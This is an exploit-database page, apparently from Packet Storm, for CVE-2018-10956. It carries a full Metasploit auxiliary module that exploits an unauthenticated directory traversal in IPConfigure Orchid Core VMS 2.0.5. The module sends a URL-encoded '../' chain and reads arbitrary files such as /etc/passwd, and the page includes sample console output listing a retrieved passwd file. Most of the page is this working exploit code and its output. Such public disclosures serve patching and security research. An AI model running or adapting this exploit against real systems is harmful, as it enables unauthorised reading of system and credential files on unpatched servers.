IPConfigure Orchid VMS 2.0.5 Directory Traversal / Information Disclosure

🗓️ 21 Jun 2018 00:00:00Reported by Sanjiv KawaType

packetstorm🔗 packetstormsecurity.com👁 37 Views

Reporter	Title	Published	Views	Family All 12
0day.today	IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure Exploit	21 Jun 201800:00	–	zdt
Check Point Advisories	IPConfigure Orchid Core VMS Directory Traversal (CVE-2018-10956)	31 May 202000:00	–	checkpoint_advisories
CVE	CVE-2018-10956	25 Jun 201815:00	–	cve
Cvelist	CVE-2018-10956	25 Jun 201815:00	–	cvelist
Exploit DB	IPConfigure Orchid VMS 2.0.5 - Directory Traversal / Information Disclosure (Metasploit)	20 Jun 201800:00	–	exploitdb
exploitpack	IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit)	20 Jun 201800:00	–	exploitpack
Nuclei	IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion	2 Jun 202610:14	–	nuclei
NVD	CVE-2018-10956	25 Jun 201815:29	–	nvd
OpenVAS	Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check	18 Apr 201700:00	–	openvas
OSV	CVE-2018-10956	25 Jun 201815:29	–	osv

`require 'msf/core'  
  
class MetasploitModule < Msf::Auxiliary  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'IPConfigure Orchid VMS <=2.0.5 Directory Traversal Information Disclosure',  
'Description' => %q{  
Orchid Core VMS is vulnerable to a directory traversal attack. This affects Linux and Windows operating systems. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the sudoers group. As such, any file on the underlying system, for which the location is known, can be read.   
  
This module was tested against 2.0.5. This has been fixed in 2.0.6.  
},  
'Author' => [ 'Sanjiv Kawa @kawabungah' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2018-10956' ],  
[ 'URL', 'https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/' ],  
[ 'URL', 'http://ipconfigure.com/products/orchid-archives' ]  
],  
'DisclosureDate' => 'May 7, 2018'))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The base path to Orchid VMS', '/']),  
OptString.new('FILE', [ true, 'This is the file to download', '/etc/passwd']),  
OptString.new('INPUTFILE', [ false, 'Specify a list of files to download']),  
Opt::RPORT(80)  
], self.class )  
end  
  
def init_request(path)  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => path  
})  
  
return res  
end  
  
def run  
path = normalize_uri(target_uri.path)  
res = init_request(path)  
  
if res && res.code == 200  
file = Array.new  
trigger = "%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F"  
  
  
if datastore['INPUTFILE'].nil? || datastore['INPUTFILE'].empty?  
file = [datastore['FILE']]  
else  
file = File.open([datastore['INPUTFILE']].join(', ').to_s).readlines  
end  
  
for i in 0 .. file.length - 1  
path = normalize_uri(target_uri.path) + trigger + file[i]  
res = init_request(path)  
  
if res.code == 200  
print_good("Obtained #{datastore['FILE']}")  
puts res.body  
puts ""  
else  
print_error("#{datastore['FILE']} does not exist")  
puts res.body  
puts ""  
end  
end  
else  
print_error("Web Server is Unresponsive")  
end  
end  
end  
__END__  
msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > show options   
  
Module options (auxiliary/scanner/http/orchid_core_vms_directory_traversal):  
  
Name Current Setting Required Description  
---- --------------- -------- -----------  
FILE /etc/passwd yes This is the file to download  
INPUTFILE no Specify a list of files to downloads  
Proxies no A proxy chain of format type:host:port[,type:host:port][...]  
RHOST 10.100.100.100 yes The target address  
RPORT 80 yes The target port (TCP)  
SSL false no Negotiate SSL/TLS for outgoing connections  
TARGETURI / yes The base path to Orchid VMS  
VHOST no HTTP server virtual host  
  
msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > run  
  
[+] Obtained /etc/passwd  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false  
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false  
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false  
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false  
syslog:x:104:108::/home/syslog:/bin/false  
_apt:x:105:65534::/nonexistent:/bin/false  
lxd:x:106:65534::/var/lib/lxd/:/bin/false  
messagebus:x:107:111::/var/run/dbus:/bin/false  
uuidd:x:108:112::/run/uuidd:/bin/false  
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false  
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin  
pollinate:x:111:1::/var/cache/pollinate:/bin/false  
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash  
  
`

21 Jun 2018 00:00Current

7.7High risk

Vulners AI Score7.7

EPSS0.92082